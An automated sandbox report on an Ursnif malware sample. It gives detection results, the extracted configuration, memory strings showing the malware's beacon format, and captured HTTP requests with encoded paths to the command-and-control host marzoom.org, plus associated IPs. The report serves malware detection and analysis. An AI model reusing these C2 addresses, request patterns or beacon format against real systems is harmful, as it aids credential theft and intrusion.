Analysis Report 5fbce6bbc8cc4png

AV Detection:

Found malware configuration

Source: regsvr32.exe.5348.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@820094hh", "dns": "820094", "version": "250166", "uptime": "127", "crc": "2", "id": "4343", "user": "253fc4ee08f8d2d8cdc8873a32471c43", "soft": "3"}

Multi AV Scanner detection for submitted file

Source: 5fbce6bbc8cc4png.dll	Virustotal: Detection: 17%			Perma Link
Source: 5fbce6bbc8cc4png.dll	ReversingLabs: Detection: 14%

Machine Learning detection for sample

Source: 5fbce6bbc8cc4png.dll

Joe Sandbox ML: detected

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00DA42B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

1_2_00DA42B4

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler			Jump to behavior

Found Tor onion address

Source: powershell.exe, 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 87.248.118.23 87.248.118.23
Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /images/DMNW_2FiFS2/kU18VHhh_2FhNa/ykfgxV24M2XHAPEOCVsS_/2F6u8Thf0pqDm8St/qrX4WdbK0G7R_2F/eRyIoWTGYIKkGI4nq_/2BGGBb5FQ/_2FVDrz7bW_2BOCegFxt/aVW26paKEDZtdXM5Hwa/_2FeavYnDbF2oSOnKb3NMU/_2FMnUXI9T3Ev/iVy_2Fzf/69fhAoIdBGmhS2l8WR6xI3c/fak.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: marzoom.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: marzoom.orgConnection: Keep-AliveCookie: PHPSESSID=i1oe25mc6mj7h4s8ftuk724pd0; lang=en
Source: global traffic	HTTP traffic detected: GET /images/ZISzpj4dHIQhK/N2EKsXxS/ePeyq1nf_2F2el9y2BfaZJi/hZE8c6XyLc/h1OoZaf_2FoUsDeUO/5lpg2zfBdB74/a3U4tUDFqtw/puK0WyRRfLfgu3/tfTnqs023eP9TH2FXJmDO/HfmhqZat8ae_2FgE/mvxFAS4Yi8gHMYb/BA2IbrAy50oZsG7Vw1/lzpNQXhZI/UJQi0j4i/EFH.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: marzoom.orgConnection: Keep-AliveCookie: lang=en; PHPSESSID=i1oe25mc6mj7h4s8ftuk724pd0
Source: global traffic	HTTP traffic detected: GET /images/JLFn4P5SS/GgFBU_2Fec9T32_2FMKX/wJ_2FbJfUk23zaPIgTO/WxpoF84pmw9jbx8qiXuall/C5uOnUuOrW09O/ixcJScHP/gEqEEl37LsO2Ii5XiY8n51X/1XqKh7fqsO/tz8CjpV23ImBJVkxP/SwkuTOU0eItM/XTwS8g_2F8T/xjojle1AiFRlNa/2HZeP5AhT/eSPELFIZsCMN/e.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: marzoom.orgConnection: Keep-AliveCookie: lang=en; PHPSESSID=i1oe25mc6mj7h4s8ftuk724pd0

Found strings which match to known social media urls

Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.msn.com

Urls found in memory or binary data

Source: explorer.exe, 00000021.00000000.364212205.000000000E8C0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.364212205.000000000E8C0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, explorer.exe, 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, control.exe, 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, rundll32.exe, 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, explorer.exe, 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, control.exe, 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, rundll32.exe, 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: 5fbce6bbc8cc4png.dll	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 5fbce6bbc8cc4png.dll	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 5fbce6bbc8cc4png.dll	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000019.00000003.373799897.000001D99DD8C000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.364978704.000000000F540000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000021.00000003.369204810.000000000E4D1000.00000004.00000040.sdmp	String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000019.00000003.333669010.000001D9B67B0000.00000004.00000001.sdmp, explorer.exe, 00000021.00000003.354944479.0000000003290000.00000004.00000001.sdmp, control.exe, 00000022.00000002.360941487.0000000000C25000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.479961254.000001FC13595000.00000004.00000001.sdmp, rundll32.exe, 00000026.00000003.359558033.000001C73EF40000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: imagestore.dat.12.dr	String found in binary or memory: http://marzoom.org/favicon.ico
Source: imagestore.dat.12.dr	String found in binary or memory: http://marzoom.org/favicon.ico~
Source: explorer.exe, 00000021.00000002.488324163.0000000004E61000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.349947140.0000000004E61000.00000004.00000001.sdmp	String found in binary or memory: http://marzoom.org/images/DMNW_2FiFS2/kU18VHhh_2FhNa/ykfgxV24M2XHAPEOCVsS_/2F6u8Thf0pqDm8St/qrX4WdbK
Source: explorer.exe, 00000021.00000002.475809683.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.475841221.000001FC11790000.00000002.00000001.sdmp	String found in binary or memory: http://marzoom.org/images/JLFn4P5SS/GgFBU_2Fec9T32_2FMKX/wJ_2FbJfUk23zaPIgTO/WxpoF84pmw9jbx8qiX
Source: ~DFC7446571414297CC.TMP.3.dr	String found in binary or memory: http://marzoom.org/images/JLFn4P5SS/GgFBU_2Fec9T32_2FMKX/wJ_2FbJfUk23zaPIgTO/WxpoF84pmw9jbx8qiXuall/
Source: ~DFB32E9872F56102F6.TMP.3.dr	String found in binary or memory: http://marzoom.org/images/ZISzpj4dHIQhK/N2EKsXxS/ePeyq1nf_2F2el9y2BfaZJi/hZE8c6XyLc/h1OoZaf_2FoUsDeU
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000019.00000002.396260184.000001D9ADEA6000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000019.00000002.377538571.000001D99E051000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
